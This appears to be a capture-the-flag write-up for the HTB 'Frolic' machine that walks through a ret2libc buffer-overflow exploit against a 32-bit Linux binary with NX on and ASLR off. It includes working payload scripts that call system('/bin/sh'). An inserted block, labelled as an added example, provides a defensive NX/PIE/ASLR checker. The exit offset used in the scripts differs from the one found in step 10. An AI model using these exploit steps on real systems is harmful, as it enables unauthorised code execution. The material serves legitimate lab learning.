Linux buffer overflow: Data Execution Prevention (DEP) bypass with ASLR disabled

n00🔑
4 min read, Oct 20, 2021


Note: this scenario is from the Frolic HTB machine.

The target is a 32-bit OS.

ROP (Return-Oriented Programming) exploit:

1. Download the binary to the local machine for testing.

2. Run the binary under gdb and pass a parameter. The parameter is printed back on the screen.

gdb rop
r Golu

3. Creating and sending a long pattern string:

/usr/bin/msf-pattern_create -l 100
r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

We got Segmentation fault!

We can also use gdb’s pattern_create option:

4. Finding the offset:

a) Note the EIP value (b7Ab) and pass it to the pattern offset script:

/usr/bin/msf-pattern_offset -q b7Ab -l 100

We can also use gdb’s pattern_offset option:

pattern_offset 0x41474141

5. Confirming the offset (52):

We send 52 A’s (0x41 in hexadecimal) followed by 4 B’s (0x42 in hexadecimal).

r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

We can see that EIP holds the 4 B’s (0x42424242), so we now control EIP.

6. Checking the status of the different memory protection mechanisms:

Note: NX (DEP, Data Execution Prevention) is enabled, therefore we cannot jump to shellcode that we passed as input onto the stack.

7. Checking the ASLR (Address Space Layout Randomization) status on the target:

cat /proc/sys/kernel/randomize_va_space

A value of 0 means the protection is disabled.

If it is set to 1, whether the binary is randomized depends on whether the binary has PIE support.

If it is set to 2, ASLR is enabled regardless of whether the binary has PIE support.
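Steps 6 and 7 decide whether this attack path exists at all, so it is worth checking them without relying on a screenshot. The script below is an added example and not part of the original post: it reads NX (the PT_GNU_STACK program header) and PIE (ELF type ET_DYN) straight from a 32-bit ELF’s own headers, combines them with the randomize_va_space value, and reports whether the libc base is fixed, which is the condition the hardcoded-address approach above depends on. build_elf32 constructs a minimal test image; check_host is the real entry point and assumes a Linux host.

```python
import struct

PT_GNU_STACK = 0x6474e551   # program header that carries the stack permissions
PF_X = 0x1
ET_EXEC, ET_DYN = 2, 3      # ET_DYN executables are PIE

def inspect_elf32(data):
    """Return NX and PIE facts for a little-endian 32-bit ELF image."""
    if data[:4] != b"\x7fELF" or data[4] != 1 or data[5] != 1:
        raise ValueError("expected a little-endian 32-bit ELF image")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<I", data, 28)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    stack_exec = True       # no PT_GNU_STACK at all => legacy executable stack
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if struct.unpack_from("<I", data, off)[0] == PT_GNU_STACK:
            p_flags = struct.unpack_from("<I", data, off + 24)[0]
            stack_exec = bool(p_flags & PF_X)
    return {"nx": not stack_exec, "pie": e_type == ET_DYN}

def aslr_report(facts, randomize_va_space):
    """Combine binary facts with /proc/sys/kernel/randomize_va_space (0, 1 or 2)."""
    libc_randomized = randomize_va_space >= 1            # mmap bases (shared libs) move
    return {
        "nx": facts["nx"],
        "pie": facts["pie"],
        "libc_base_randomized": libc_randomized,
        "binary_base_randomized": libc_randomized and facts["pie"],
        # NX alone stops stack shellcode, but with a fixed libc base the
        # hardcoded-address ret2libc above still works: this is the finding to fix.
        "hardcoded_ret2libc_feasible": not libc_randomized,
    }

def check_host(binary_path):
    """Run the check against a real binary on a Linux host."""
    with open(binary_path, "rb") as f:
        facts = inspect_elf32(f.read())
    with open("/proc/sys/kernel/randomize_va_space") as f:
        return aslr_report(facts, int(f.read().strip()))

def build_elf32(e_type, stack_flags=None):
    """Constructed minimal ELF32 image (header + optional PT_GNU_STACK) for testing."""
    phdr = b"" if stack_flags is None else struct.pack(
        "<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS32, LSB, version 1
    hdr = struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0, 52 if phdr else 0,
                      0, 0, 52, 32, 1 if phdr else 0, 0, 0, 0)
    return ident + hdr + phdr
```

A PT_GNU_STACK with flags 6 (RW) means NX is on, flags 7 (RWX) or no such header means the stack is executable.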

8. Finding the base address of libc:

ldd rop

0xb7e19000

9. Finding the address of the system function in the libc shared library:

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system

0x0003ada0

10. Finding the address of the exit function in the libc shared library:

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -i exit

0x000b07c8

11. Finding the address of the string /bin/sh in the libc shared library:

strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"

15ba0b

We pad this with zeros to a full 32-bit value:

0x0015ba0b

12. So far we have all the prerequisites for writing the exploit script, so let’s do that :)

a) Python 3:

#!/usr/bin/python3
from pwn import *

junk = b'A' * 52                           # filler up to the saved return address (offset 52)
libc_addr = 0xb7e19000                     # libc base from ldd (ASLR disabled, so it is fixed)
system_addr = p32(libc_addr + 0x0003ada0)  # system(): overwrites the saved EIP
exit_addr = p32(libc_addr + 0x0002e9d0)    # return address for system(): exit()
binsh_addr = p32(libc_addr + 0x0015ba0b)   # first argument of system(): "/bin/sh"
payload = junk + system_addr + exit_addr + binsh_addr
with open("payload.txt", "wb") as f:
    f.write(payload)

b) Passing the payload file contents to the program:

/home/ayush/.binary/rop `cat payload.txt`

Note: in Python 3 I was unable to add the two addresses in hex using the struct module, therefore I used pwntools instead.

b) Python 2:

#!/usr/bin/python2
import struct

junk = 'A' * 52                                            # filler up to the saved return address (offset 52)
libc_addr = 0xb7e19000                                     # libc base from ldd (ASLR disabled, so it is fixed)
system_addr = struct.pack("<I", libc_addr + 0x0003ada0)   # system(): overwrites the saved EIP
exit_addr = struct.pack("<I", libc_addr + 0x0002e9d0)     # return address for system(): exit()
binsh_addr = struct.pack("<I", libc_addr + 0x0015ba0b)    # first argument of system(): "/bin/sh"
payload_addr = junk + system_addr + exit_addr + binsh_addr
print payload_addr

Thank you for reading!


Written by n00🔑

Computer Security Enthusiast. Usually plays HTB (ID-23862). https://www.youtube.com/@pswalia2u https://www.linkedin.com/in/pswalia2u/ Instagram @pswalia4u
